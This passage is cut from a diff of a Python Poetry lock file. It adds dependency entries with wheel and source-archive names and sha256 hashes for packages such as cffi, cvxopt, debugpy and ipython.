+ {file = "argon2_cffi-20.1.0-cp39-cp39-win_amd64.whl", hash = "sha256:8a84934bd818e14a17943de8099d41160da4a336bcc699bb4c394bbb9b94bd32"},
+]
astroid = [
{file = "astroid-2.6.6-py3-none-any.whl", hash = "sha256:ab7f36e8a78b8e54a62028ba6beef7561db4cdb6f2a5009ecc44a6f42b5697ef"},
{file = "astroid-2.6.6.tar.gz", hash = "sha256:3975a0bd5373bdce166e60c851cfcbaf21ee96de80ec518c1f4cb3e94c3fb334"},
]
+async-generator = [
+ {file = "async_generator-1.10-py3-none-any.whl", hash = "sha256:01c7bf666359b4967d2cda0000cc2e4af16a0ae098cbffcb8472fb9e8ad6585b"},
+ {file = "async_generator-1.10.tar.gz", hash = "sha256:6ebb3d106c12920aaae42ccb6f787ef5eefdcdd166ea3d628fa8476abe712144"},
+]
atomicwrites = [
{file = "atomicwrites-1.4.0-py2.py3-none-any.whl", hash = "sha256:6d1784dea7c0c8d4a5172b6c620f40b6e4cbfdf96d783691f2e1302a7b88e197"},
{file = "atomicwrites-1.4.0.tar.gz", hash = "sha256:ae70396ad1a434f9c7046fd2dd196fc04b12f9e91ffb859164193be8b6168a7a"},
@@ -297,10 +1165,77 @@ attrs = [
{file = "attrs-21.2.0-py2.py3-none-any.whl", hash = "sha256:149e90d6d8ac20db7a955ad60cf0e6881a3f20d37096140088356da6c716b0b1"},
{file = "attrs-21.2.0.tar.gz", hash = "sha256:ef6aaac3ca6cd92904cdd0d83f629a15f18053ec84e6432106f7a4d04ae4f5fb"},
]
+babel = [
+ {file = "Babel-2.9.1-py2.py3-none-any.whl", hash = "sha256:ab49e12b91d937cd11f0b67cb259a57ab4ad2b59ac7a3b41d6c06c0ac5b0def9"},
+ {file = "Babel-2.9.1.tar.gz", hash = "sha256:bc0c176f9f6a994582230df350aa6e05ba2ebe4b3ac317eab29d9be5d2768da0"},
+]
+backcall = [
+ {file = "backcall-0.2.0-py2.py3-none-any.whl", hash = "sha256:fbbce6a29f263178a1f7915c1940bde0ec2b2a967566fe1c65c1dfb7422bd255"},
+ {file = "backcall-0.2.0.tar.gz", hash = "sha256:5cbdbf27be5e7cfadb448baf0aa95508f91f2bbc6c6437cd9cd06e2a4c215e1e"},
+]
black = [
{file = "black-21.7b0-py3-none-any.whl", hash = "sha256:1c7aa6ada8ee864db745b22790a32f94b2795c253a75d6d9b5e439ff10d23116"},
{file = "black-21.7b0.tar.gz", hash = "sha256:c8373c6491de9362e39271630b65b964607bc5c79c83783547d76c839b3aa219"},
]
+bleach = [
+ {file = "bleach-4.0.0-py2.py3-none-any.whl", hash = "sha256:c1685a132e6a9a38bf93752e5faab33a9517a6c0bb2f37b785e47bf253bdb51d"},
+ {file = "bleach-4.0.0.tar.gz", hash = "sha256:ffa9221c6ac29399cc50fcc33473366edd0cf8d5e2cbbbb63296dc327fb67cc8"},
+]
+certifi = [
+ {file = "certifi-2021.5.30-py2.py3-none-any.whl", hash = "sha256:50b1e4f8446b06f41be7dd6338db18e0990601dce795c2b1686458aa7e8fa7d8"},
+ {file = "certifi-2021.5.30.tar.gz", hash = "sha256:2bbf76fd432960138b3ef6dda3dde0544f27cbf8546c458e60baf371917ba9ee"},
+]
+cffi = [
+ {file = "cffi-1.14.6-cp27-cp27m-macosx_10_9_x86_64.whl", hash = "sha256:22b9c3c320171c108e903d61a3723b51e37aaa8c81255b5e7ce102775bd01e2c"},
+ {file = "cffi-1.14.6-cp27-cp27m-manylinux1_i686.whl", hash = "sha256:f0c5d1acbfca6ebdd6b1e3eded8d261affb6ddcf2186205518f1428b8569bb99"},
+ {file = "cffi-1.14.6-cp27-cp27m-manylinux1_x86_64.whl", hash = "sha256:99f27fefe34c37ba9875f224a8f36e31d744d8083e00f520f133cab79ad5e819"},
+ {file = "cffi-1.14.6-cp27-cp27m-win32.whl", hash = "sha256:55af55e32ae468e9946f741a5d51f9896da6b9bf0bbdd326843fec05c730eb20"},
+ {file = "cffi-1.14.6-cp27-cp27m-win_amd64.whl", hash = "sha256:7bcac9a2b4fdbed2c16fa5681356d7121ecabf041f18d97ed5b8e0dd38a80224"},
+ {file = "cffi-1.14.6-cp27-cp27mu-manylinux1_i686.whl", hash = "sha256:ed38b924ce794e505647f7c331b22a693bee1538fdf46b0222c4717b42f744e7"},
+ {file = "cffi-1.14.6-cp27-cp27mu-manylinux1_x86_64.whl", hash = "sha256:e22dcb48709fc51a7b58a927391b23ab37eb3737a98ac4338e2448bef8559b33"},
+ {file = "cffi-1.14.6-cp35-cp35m-macosx_10_9_x86_64.whl", hash = "sha256:aedb15f0a5a5949ecb129a82b72b19df97bbbca024081ed2ef88bd5c0a610534"},
+ {file = "cffi-1.14.6-cp35-cp35m-manylinux1_i686.whl", hash = "sha256:48916e459c54c4a70e52745639f1db524542140433599e13911b2f329834276a"},
+ {file = "cffi-1.14.6-cp35-cp35m-manylinux1_x86_64.whl", hash = "sha256:f627688813d0a4140153ff532537fbe4afea5a3dffce1f9deb7f91f848a832b5"},
+ {file = "cffi-1.14.6-cp35-cp35m-win32.whl", hash = "sha256:f0010c6f9d1a4011e429109fda55a225921e3206e7f62a0c22a35344bfd13cca"},
+ {file = "cffi-1.14.6-cp35-cp35m-win_amd64.whl", hash = "sha256:57e555a9feb4a8460415f1aac331a2dc833b1115284f7ded7278b54afc5bd218"},
+ {file = "cffi-1.14.6-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:e8c6a99be100371dbb046880e7a282152aa5d6127ae01783e37662ef73850d8f"},
+ {file = "cffi-1.14.6-cp36-cp36m-manylinux1_i686.whl", hash = "sha256:19ca0dbdeda3b2615421d54bef8985f72af6e0c47082a8d26122adac81a95872"},
+ {file = "cffi-1.14.6-cp36-cp36m-manylinux1_x86_64.whl", hash = "sha256:d950695ae4381ecd856bcaf2b1e866720e4ab9a1498cba61c602e56630ca7195"},
+ {file = "cffi-1.14.6-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e9dc245e3ac69c92ee4c167fbdd7428ec1956d4e754223124991ef29eb57a09d"},
+ {file = "cffi-1.14.6-cp36-cp36m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:a8661b2ce9694ca01c529bfa204dbb144b275a31685a075ce123f12331be790b"},
+ {file = "cffi-1.14.6-cp36-cp36m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:b315d709717a99f4b27b59b021e6207c64620790ca3e0bde636a6c7f14618abb"},
+ {file = "cffi-1.14.6-cp36-cp36m-win32.whl", hash = "sha256:80b06212075346b5546b0417b9f2bf467fea3bfe7352f781ffc05a8ab24ba14a"},
+ {file = "cffi-1.14.6-cp36-cp36m-win_amd64.whl", hash = "sha256:a9da7010cec5a12193d1af9872a00888f396aba3dc79186604a09ea3ee7c029e"},
+ {file = "cffi-1.14.6-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:4373612d59c404baeb7cbd788a18b2b2a8331abcc84c3ba40051fcd18b17a4d5"},
+ {file = "cffi-1.14.6-cp37-cp37m-manylinux1_i686.whl", hash = "sha256:f10afb1004f102c7868ebfe91c28f4a712227fe4cb24974350ace1f90e1febbf"},
+ {file = "cffi-1.14.6-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:fd4305f86f53dfd8cd3522269ed7fc34856a8ee3709a5e28b2836b2db9d4cd69"},
+ {file = "cffi-1.14.6-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6d6169cb3c6c2ad50db5b868db6491a790300ade1ed5d1da29289d73bbe40b56"},
+ {file = "cffi-1.14.6-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:5d4b68e216fc65e9fe4f524c177b54964af043dde734807586cf5435af84045c"},
+ {file = "cffi-1.14.6-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:33791e8a2dc2953f28b8d8d300dde42dd929ac28f974c4b4c6272cb2955cb762"},
+ {file = "cffi-1.14.6-cp37-cp37m-win32.whl", hash = "sha256:0c0591bee64e438883b0c92a7bed78f6290d40bf02e54c5bf0978eaf36061771"},
+ {file = "cffi-1.14.6-cp37-cp37m-win_amd64.whl", hash = "sha256:8eb687582ed7cd8c4bdbff3df6c0da443eb89c3c72e6e5dcdd9c81729712791a"},
+ {file = "cffi-1.14.6-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:ba6f2b3f452e150945d58f4badd92310449876c4c954836cfb1803bdd7b422f0"},
+ {file = "cffi-1.14.6-cp38-cp38-manylinux1_i686.whl", hash = "sha256:64fda793737bc4037521d4899be780534b9aea552eb673b9833b01f945904c2e"},
+ {file = "cffi-1.14.6-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:9f3e33c28cd39d1b655ed1ba7247133b6f7fc16fa16887b120c0c670e35ce346"},
+ {file = "cffi-1.14.6-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:26bb2549b72708c833f5abe62b756176022a7b9a7f689b571e74c8478ead51dc"},
+ {file = "cffi-1.14.6-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:eb687a11f0a7a1839719edd80f41e459cc5366857ecbed383ff376c4e3cc6afd"},
+ {file = "cffi-1.14.6-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:d2ad4d668a5c0645d281dcd17aff2be3212bc109b33814bbb15c4939f44181cc"},
+ {file = "cffi-1.14.6-cp38-cp38-win32.whl", hash = "sha256:487d63e1454627c8e47dd230025780e91869cfba4c753a74fda196a1f6ad6548"},
+ {file = "cffi-1.14.6-cp38-cp38-win_amd64.whl", hash = "sha256:c33d18eb6e6bc36f09d793c0dc58b0211fccc6ae5149b808da4a62660678b156"},
+ {file = "cffi-1.14.6-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:06c54a68935738d206570b20da5ef2b6b6d92b38ef3ec45c5422c0ebaf338d4d"},
+ {file = "cffi-1.14.6-cp39-cp39-manylinux1_i686.whl", hash = "sha256:f174135f5609428cc6e1b9090f9268f5c8935fddb1b25ccb8255a2d50de6789e"},
+ {file = "cffi-1.14.6-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:f3ebe6e73c319340830a9b2825d32eb6d8475c1dac020b4f0aa774ee3b898d1c"},
+ {file = "cffi-1.14.6-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3c8d896becff2fa653dc4438b54a5a25a971d1f4110b32bd3068db3722c80202"},
+ {file = "cffi-1.14.6-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:4922cd707b25e623b902c86188aca466d3620892db76c0bdd7b99a3d5e61d35f"},
+ {file = "cffi-1.14.6-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:c9e005e9bd57bc987764c32a1bee4364c44fdc11a3cc20a40b93b444984f2b87"},
+ {file = "cffi-1.14.6-cp39-cp39-win32.whl", hash = "sha256:eb9e2a346c5238a30a746893f23a9535e700f8192a68c07c0258e7ece6ff3728"},
+ {file = "cffi-1.14.6-cp39-cp39-win_amd64.whl", hash = "sha256:818014c754cd3dba7229c0f5884396264d51ffb87ec86e927ef0be140bfdb0d2"},
+ {file = "cffi-1.14.6.tar.gz", hash = "sha256:c9a875ce9d7fe32887784274dd533c57909b7b1dcadcc128a2ac21331a9765dd"},
+]
+charset-normalizer = [
+ {file = "charset-normalizer-2.0.4.tar.gz", hash = "sha256:f23667ebe1084be45f6ae0538e4a5a865206544097e4e8bbcacf42cd02a348f3"},
+ {file = "charset_normalizer-2.0.4-py3-none-any.whl", hash = "sha256:0c8911edd15d19223366a194a513099a302055a962bca2cec0f54b8b63175d8b"},
+]
click = [
{file = "click-8.0.1-py3-none-any.whl", hash = "sha256:fba402a4a47334742d782209a7c79bc448911afe1149d07bdabdf480b3e2f4b6"},
{file = "click-8.0.1.tar.gz", hash = "sha256:8c04c11192119b1ef78ea049e0a6f0463e4c48ef00a30160c704337586f3ad7a"},
@@ -309,10 +1244,164 @@ colorama = [
{file = "colorama-0.4.4-py2.py3-none-any.whl", hash = "sha256:9f47eda37229f68eee03b24b9748937c7dc3868f906e8ba69fbcbdd3bc5dc3e2"},
{file = "colorama-0.4.4.tar.gz", hash = "sha256:5941b2b48a20143d2267e95b1c2a7603ce057ee39fd88e7329b0c292aa16869b"},
]
+cvxopt = [
+ {file = "cvxopt-1.2.6-cp27-cp27m-macosx_10_9_x86_64.whl", hash = "sha256:b5b2288a467c0c3996899c10783c8d78878aeb01d43a66697e9993ff76ac5cae"},
+ {file = "cvxopt-1.2.6-cp27-cp27m-manylinux1_i686.whl", hash = "sha256:c57d7d2347ba98432a2ed5af3169026db6d191274c49fccb5357a7cdfb410e5b"},
+ {file = "cvxopt-1.2.6-cp27-cp27m-manylinux1_x86_64.whl", hash = "sha256:0cd32bed5fec871d36d32f0a86c927e2837b9c60fc23b6f777108c3a95f248e5"},
+ {file = "cvxopt-1.2.6-cp27-cp27mu-manylinux1_i686.whl", hash = "sha256:0b335bf18f7e42326105f9090e5bb7bbdecfce3c3b4c612ca4e538b00383e937"},
+ {file = "cvxopt-1.2.6-cp27-cp27mu-manylinux1_x86_64.whl", hash = "sha256:97f7624837bd2e072bd909d4c53155b13a427dac6e0c2ea3d5e471443c289489"},
+ {file = "cvxopt-1.2.6-cp35-cp35m-macosx_10_6_intel.whl", hash = "sha256:5980abb9a7e43a072dfd95e7c542e43afc2cb487f11000e33be2854dafcf15fe"},
+ {file = "cvxopt-1.2.6-cp35-cp35m-manylinux1_x86_64.whl", hash = "sha256:5f2e9e308d931bd52f4dbb55073edebd03073e5f1627f82959da4b95321f89dd"},
+ {file = "cvxopt-1.2.6-cp35-cp35m-win32.whl", hash = "sha256:fa5568d4d64e4cc24da4094c0066c67308e805287a742ad298f122f0cad360ca"},
+ {file = "cvxopt-1.2.6-cp35-cp35m-win_amd64.whl", hash = "sha256:d505932dfe734ff14ee0c3c04fc5618bb7cc744f59e0edfed4a8851deab8ee42"},
+ {file = "cvxopt-1.2.6-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:6ab795743b0e42529d015b889576783a1264e6056417f54870c42db191482065"},
+ {file = "cvxopt-1.2.6-cp36-cp36m-manylinux1_x86_64.whl", hash = "sha256:fb1149e2764e5284b560434cbc5ee7e60199fc7eaf850d5ba26d02fbc24d4006"},
+ {file = "cvxopt-1.2.6-cp36-cp36m-win32.whl", hash = "sha256:7db648536ecef417df42108b7b779891946a6cc791b74e843d23d846c5576d1a"},
+ {file = "cvxopt-1.2.6-cp36-cp36m-win_amd64.whl", hash = "sha256:7cd9f1c8404ed507257550f485b3394b1a38087da4ff70032dca964a73e138f3"},
+ {file = "cvxopt-1.2.6-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:1e76dabd13377f6876073041beee67e4613879a1ac6a572a9254aafa8ca7f7fe"},
+ {file = "cvxopt-1.2.6-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:368caf7d2130670e6e48af0d611ae41713a98d7643f7d64a6aeabefad50e76c4"},
+ {file = "cvxopt-1.2.6-cp37-cp37m-win32.whl", hash = "sha256:95b2cd31d57341279e98888479c71496529eade2eccf5582e671ce96ef575c38"},
+ {file = "cvxopt-1.2.6-cp37-cp37m-win_amd64.whl", hash = "sha256:f343ddd406caec05408d007e313022a073a7466c0356ac96e20256d0b542916b"},
+ {file = "cvxopt-1.2.6-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:fdeb3ce110708229ee4acbd4c894ffe031e2dafb2ba6469068fed0cc20671b89"},
+ {file = "cvxopt-1.2.6-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:c420cf196c8d2733022f29e77ace46871b82f2f2a25edcb585a20c0c76bec02d"},
+ {file = "cvxopt-1.2.6-cp38-cp38-win32.whl", hash = "sha256:ba75971b78777ec10361de81a1feb6f27757b505054dbe3cfde5a4f19cccbe2e"},
+ {file = "cvxopt-1.2.6-cp38-cp38-win_amd64.whl", hash = "sha256:b7a9ee4d3ecdd0f2a190e935613073c15594b52f581e0327ba4e869277f793f7"},
+ {file = "cvxopt-1.2.6-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:edae9dafec8f52594ae6312b9ff811ad10d0504ca935e09aa66a309e6d7c2397"},
+ {file = "cvxopt-1.2.6-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:2bac183859127ebc473b9bc66be17c0dbc8a3c8bd0939d460cfe6d141bc545db"},
+ {file = "cvxopt-1.2.6-cp39-cp39-win32.whl", hash = "sha256:3eb14814b7b79f765e107c50b0961e71d47a36a760ccf3f1fde2ca65d75a9f11"},
+ {file = "cvxopt-1.2.6-cp39-cp39-win_amd64.whl", hash = "sha256:6e05d9f541368950bfb7b0ab1f648087397a60728fd4699fe29e90462931ac39"},
+ {file = "cvxopt-1.2.6.tar.gz", hash = "sha256:a4c433706fd0ad9d47e7f222773a7f7601766fb8e74b633524b3c3fce29aa73e"},
+]
+debugpy = [
+ {file = "debugpy-1.4.1-cp27-cp27m-macosx_10_14_x86_64.whl", hash = "sha256:a2c5a1c49239707ed5bc8e97d8f9252fb392d9e13c79c7b477593d7dde4ae24a"},
+ {file = "debugpy-1.4.1-cp27-cp27m-manylinux1_i686.whl", hash = "sha256:ebc241351791595796864a960892e1cd58627064feda939d0377edd0730bbff2"},
+ {file = "debugpy-1.4.1-cp27-cp27m-manylinux1_x86_64.whl", hash = "sha256:939c94d516e6ed5433cc3ba12d9d0d8108499587158ae5f76f6db18d49e21b5b"},
+ {file = "debugpy-1.4.1-cp27-cp27m-manylinux2010_i686.whl", hash = "sha256:e47c42bc1a68ead3c39d9a658d3ccf311bc45dc84f3c90fa5cb7de1796243f47"},
+ {file = "debugpy-1.4.1-cp27-cp27m-manylinux2010_x86_64.whl", hash = "sha256:3756cd421be701d06490635372327ebd1ccb44b37d59682c994f6bd59e040a91"},
+ {file = "debugpy-1.4.1-cp27-cp27mu-manylinux1_i686.whl", hash = "sha256:a4368c79a2c4458d5a0540381a32f8fdc02b3c9ba9dd413a49b42929297b29b3"},
+ {file = "debugpy-1.4.1-cp27-cp27mu-manylinux1_x86_64.whl", hash = "sha256:c96e82d863db97d3eb498cc8e55773004724bdeaa58fb0eb7ee7d5a21d240d6a"},
+ {file = "debugpy-1.4.1-cp27-cp27mu-manylinux2010_i686.whl", hash = "sha256:71e67d352cabdc6a3f4dc3e39a1d2d1e76763a2102a276904e3495ede48a9832"},
+ {file = "debugpy-1.4.1-cp27-cp27mu-manylinux2010_x86_64.whl", hash = "sha256:959d39f3d724d25b7ab79278f032e33df03c6376d51b3517abaf2f8e83594ee0"},
+ {file = "debugpy-1.4.1-cp35-cp35m-macosx_10_14_x86_64.whl", hash = "sha256:9d559bd0e4c288487349e0723bc70ff06390638446ee8087d4d5711486119643"},
+ {file = "debugpy-1.4.1-cp35-cp35m-manylinux1_i686.whl", hash = "sha256:7376bd8f4272ab01342940bd020955f021e26954e1f0df91cfa8bf1fa4451b56"},
+ {file = "debugpy-1.4.1-cp35-cp35m-manylinux1_x86_64.whl", hash = "sha256:dea62527a4a2770a0d12ce46564636d892bba29baaf5dba5bfe98bb55bf17a11"},
+ {file = "debugpy-1.4.1-cp35-cp35m-manylinux2010_i686.whl", hash = "sha256:12cb415e7394c6738527cbc482935aa9414e9b4cc87dd040015d0e5cb8b4471a"},
+ {file = "debugpy-1.4.1-cp35-cp35m-manylinux2010_x86_64.whl", hash = "sha256:3a6dee475102d0169732162b735878e8787500719ccb4d54b1458afe992a4c4d"},
+ {file = "debugpy-1.4.1-cp35-cp35m-manylinux2014_i686.whl", hash = "sha256:7e12e94aa2c9a0017c0a84cd475063108d06e305360b69c933bde17a6a527f80"},
+ {file = "debugpy-1.4.1-cp35-cp35m-manylinux2014_x86_64.whl", hash = "sha256:2bfda2721046fb43a7074d475a12adcd55a65bfd23a1ff675427b09a01ba40cc"},
+ {file = "debugpy-1.4.1-cp35-cp35m-win32.whl", hash = "sha256:732ac8bb79694cb4127c08bfc6128274f3dee9e6fd2ddde7bf026a40efeb202d"},
+ {file = "debugpy-1.4.1-cp35-cp35m-win_amd64.whl", hash = "sha256:bad668e9edb21199017ab31f52a05e14506ad6566110560796d2a8f258e0b819"},
+ {file = "debugpy-1.4.1-cp36-cp36m-macosx_10_14_x86_64.whl", hash = "sha256:cd36e75c0f71a924f4b4cdb5f74b3321952cf636aadf70e0f85fd9cd2edfc1d0"},
+ {file = "debugpy-1.4.1-cp36-cp36m-manylinux1_i686.whl", hash = "sha256:eee2224ce547d2958ffc0d63cd280a9cc6377043f32ce370cfe4ca6be4e05476"},
+ {file = "debugpy-1.4.1-cp36-cp36m-manylinux1_x86_64.whl", hash = "sha256:e6711106aafc26ecb78e43c4be0a49bd0ae4a1f3e1aa502de151e38f4717b2a2"},
+ {file = "debugpy-1.4.1-cp36-cp36m-manylinux2010_i686.whl", hash = "sha256:768f393ffaa66a3b3ed92b06e21912a5df3e01f18fb531bcbba2f94cad1725a7"},
+ {file = "debugpy-1.4.1-cp36-cp36m-manylinux2010_x86_64.whl", hash = "sha256:ab37f189b1dd0d8420545c9f3d066bd1601a1ae85b26de38f5c1ccb96cf0b042"},
+ {file = "debugpy-1.4.1-cp36-cp36m-manylinux2014_i686.whl", hash = "sha256:00f9d14da52b87e98e26f5c3c8f1937cc496915b38f8ccb7b329336b21898678"},
+ {file = "debugpy-1.4.1-cp36-cp36m-manylinux2014_x86_64.whl", hash = "sha256:1bc8e835a48ef23280cbaf2b70a5a2b629b9ee79685b64d974bfb8d467f4aa67"},
+ {file = "debugpy-1.4.1-cp36-cp36m-win32.whl", hash = "sha256:309909b6c85f89aea3fa10fc256b52fef3c25fee4d00e1b5f5db1ace57203a2c"},
+ {file = "debugpy-1.4.1-cp36-cp36m-win_amd64.whl", hash = "sha256:67d496890d1cada5ce924cb30178684e7b82a36b80b8868beb148db54fd9e44c"},
+ {file = "debugpy-1.4.1-cp37-cp37m-macosx_10_14_x86_64.whl", hash = "sha256:595170ac17567773b546d40a0ff002dc350cfcd95c9233f65e79370954fb9a01"},
+ {file = "debugpy-1.4.1-cp37-cp37m-manylinux1_i686.whl", hash = "sha256:c5e771fcd12727f734caf2a10ff92966ae9857db0ccb6bebd1a4f776c54186a8"},
+ {file = "debugpy-1.4.1-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:2d4c4ab934fbe1c7095d19b3d4246afe119396b49540ca5d5ad34ef01b27bd2a"},
+ {file = "debugpy-1.4.1-cp37-cp37m-manylinux2010_i686.whl", hash = "sha256:4655824321b36b353b12d1617a29c79320412f085ecabf54524603b4c0c791e8"},
+ {file = "debugpy-1.4.1-cp37-cp37m-manylinux2010_x86_64.whl", hash = "sha256:399b2c60c8e67a5d30c6e4522129e8be8d484e6064286f8ba3ce857a3927312a"},
+ {file = "debugpy-1.4.1-cp37-cp37m-manylinux2014_i686.whl", hash = "sha256:8e63585c372873cd88c2380c0b3c4815c724a9713f5b86d1b3a1f1ac30df079e"},
+ {file = "debugpy-1.4.1-cp37-cp37m-manylinux2014_x86_64.whl", hash = "sha256:52920ccb4acdbb2a9a42e0a4d60a7bbc4a34bf16fd23c674b280f8e9a8cacbd6"},
+ {file = "debugpy-1.4.1-cp37-cp37m-win32.whl", hash = "sha256:7b332ce0d1a46f0f4200d59ee78428f18301d1fb85d07402723b94e1de96951c"},
+ {file = "debugpy-1.4.1-cp37-cp37m-win_amd64.whl", hash = "sha256:a19def91a0a166877c2a26b611c1ad0473ce85b1df61ae5276197375d574228b"},
+ {file = "debugpy-1.4.1-cp38-cp38-macosx_10_14_x86_64.whl", hash = "sha256:9a0cd73d7a76222fbc9f9180612ccb4ad7d7f7e4f26e55ef1fbd459c0f2f5322"},
+ {file = "debugpy-1.4.1-cp38-cp38-manylinux1_i686.whl", hash = "sha256:86cd13162b752664e8ef048287a6973c8fba0a71f396b31cf36394880ec2a6bf"},
+ {file = "debugpy-1.4.1-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:89d53d57001e54a3854489e898c697aafb2d6bb81fca596da2400f3fd7fd397c"},
+ {file = "debugpy-1.4.1-cp38-cp38-manylinux2010_i686.whl", hash = "sha256:7b4e399790a301c83ad6b153452233695b2f15450d78956a6d297859eb44d185"},
+ {file = "debugpy-1.4.1-cp38-cp38-manylinux2010_x86_64.whl", hash = "sha256:fece69933d17e0918b73ddeb5e23bcf789edd2a6eb0d438b09c40d51e76b9c74"},
+ {file = "debugpy-1.4.1-cp38-cp38-manylinux2014_i686.whl", hash = "sha256:4e0d57a8c35b20b4e363db943b909aa83f12594e2f34070a1db5fa9b7213336b"},
+ {file = "debugpy-1.4.1-cp38-cp38-manylinux2014_x86_64.whl", hash = "sha256:f77406f33760e6f13a7ff0ac375d9c8856844b61cd95f7502b57116858f0cfe1"},
+ {file = "debugpy-1.4.1-cp38-cp38-win32.whl", hash = "sha256:3d92cb2e8b4f9591f6d6e17ccf8c1a55a58857949d9a5aae0ff37b64faaa3b80"},
+ {file = "debugpy-1.4.1-cp38-cp38-win_amd64.whl", hash = "sha256:ac2d1cdd3279806dab2119937c0769f11dee13166650aaa84b6700b30a845d10"},
+ {file = "debugpy-1.4.1-cp39-cp39-macosx_10_14_x86_64.whl", hash = "sha256:e7e049a4e8e362183a5a5b4ad058a1543211970819d0c11011c87c3a9dec2eaf"},
+ {file = "debugpy-1.4.1-cp39-cp39-manylinux1_i686.whl", hash = "sha256:cf6b26f26f97ef3033008db7b3df7233363407d7b6cacd4bc4f8e02ce8e11df4"},
+ {file = "debugpy-1.4.1-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:8a2be4e5d696ad39be6c6c37dc580993d04aad7d893fd6e449e1a055d7b5dddb"},
+ {file = "debugpy-1.4.1-cp39-cp39-manylinux2010_i686.whl", hash = "sha256:d89ab3bd51d6a3f13b093bc3881a827d8f6c9588d9a493bddb3b47f9d078fd1d"},
+ {file = "debugpy-1.4.1-cp39-cp39-manylinux2010_x86_64.whl", hash = "sha256:f20a07ac5fb0deee9be1ad1a9a124d858a8b79c66c7ec5e1767d78aa964f86c4"},
+ {file = "debugpy-1.4.1-cp39-cp39-manylinux2014_i686.whl", hash = "sha256:6bb62615b3ad3d7202b7b7eb85f3d000aa17a61303af5f11eab048c91a1f30a6"},
+ {file = "debugpy-1.4.1-cp39-cp39-manylinux2014_x86_64.whl", hash = "sha256:a9f582203af34c6978bffaba77425662e949251998276e9dece113862e753459"},
+ {file = "debugpy-1.4.1-cp39-cp39-win32.whl", hash = "sha256:129312b01ec46ab303a8c0667d559a0de0bed1a394cc128039b6f008f1c376b7"},
+ {file = "debugpy-1.4.1-cp39-cp39-win_amd64.whl", hash = "sha256:1762908202b0b0b481ec44125edb625d136d16c4991d3a7c1310c85672ffe5ba"},
+ {file = "debugpy-1.4.1-py2.py3-none-any.whl", hash = "sha256:84ff51b8b5c847d5421324ca419db1eec813a4dd2bbf19dbbbe132e2ab2b2fc6"},
+ {file = "debugpy-1.4.1.zip", hash = "sha256:889316de0b8ff3732927cb058cfbd3371e4cd0002ecc170d34c755ad289c867c"},
+]
+decorator = [
+ {file = "decorator-5.0.9-py3-none-any.whl", hash = "sha256:6e5c199c16f7a9f0e3a61a4a54b3d27e7dad0dbdde92b944426cb20914376323"},
+ {file = "decorator-5.0.9.tar.gz", hash = "sha256:72ecfba4320a893c53f9706bebb2d55c270c1e51a28789361aa93e4a21319ed5"},
+]
+defusedxml = [
+ {file = "defusedxml-0.7.1-py2.py3-none-any.whl", hash = "sha256:a352e7e428770286cc899e2542b6cdaedb2b4953ff269a210103ec58f6198a61"},
+ {file = "defusedxml-0.7.1.tar.gz", hash = "sha256:1bb3032db185915b62d7c6209c5a8792be6a32ab2fedacc84e01b52c51aa3e69"},
+]
+entrypoints = [
+ {file = "entrypoints-0.3-py2.py3-none-any.whl", hash = "sha256:589f874b313739ad35be6e0cd7efde2a4e9b6fea91edcc34e58ecbb8dbe56d19"},
+ {file = "entrypoints-0.3.tar.gz", hash = "sha256:c70dd71abe5a8c85e55e12c19bd91ccfeec11a6e99044204511f9ed547d48451"},
+]
+idna = [
+ {file = "idna-3.2-py3-none-any.whl", hash = "sha256:14475042e284991034cb48e06f6851428fb14c4dc953acd9be9a5e95c7b6dd7a"},
+ {file = "idna-3.2.tar.gz", hash = "sha256:467fbad99067910785144ce333826c71fb0e63a425657295239737f7ecd125f3"},
+]
+ipykernel = [
+ {file = "ipykernel-6.1.0-py3-none-any.whl", hash = "sha256:804202fb4a621dce163bf88ce2687c98450d7ed728ef1d17d6f5ed20744c6e02"},
+ {file = "ipykernel-6.1.0.tar.gz", hash = "sha256:e21a718c696ded7d4d5e25b13d2bdd88e099e782fd3be66f9d2e66397543d283"},
+]
+ipython = [
+ {file = "ipython-7.26.0-py3-none-any.whl", hash = "sha256:892743b65c21ed72b806a3a602cca408520b3200b89d1924f4b3d2cdb3692362"},
+ {file = "ipython-7.26.0.tar.gz", hash = "sha256:0cff04bb042800129348701f7bd68a430a844e8fb193979c08f6c99f28bb735e"},
+]
+ipython-genutils = [
+ {file = "ipython_genutils-0.2.0-py2.py3-none-any.whl", hash = "sha256:72dd37233799e619666c9f639a9da83c34013a73e8bbc79a7a6348d93c61fab8"},
+ {file = "ipython_genutils-0.2.0.tar.gz", hash = "sha256:eb2e116e75ecef9d4d228fdc66af54269afa26ab4463042e33785b887c628ba8"},
+]
isort = [
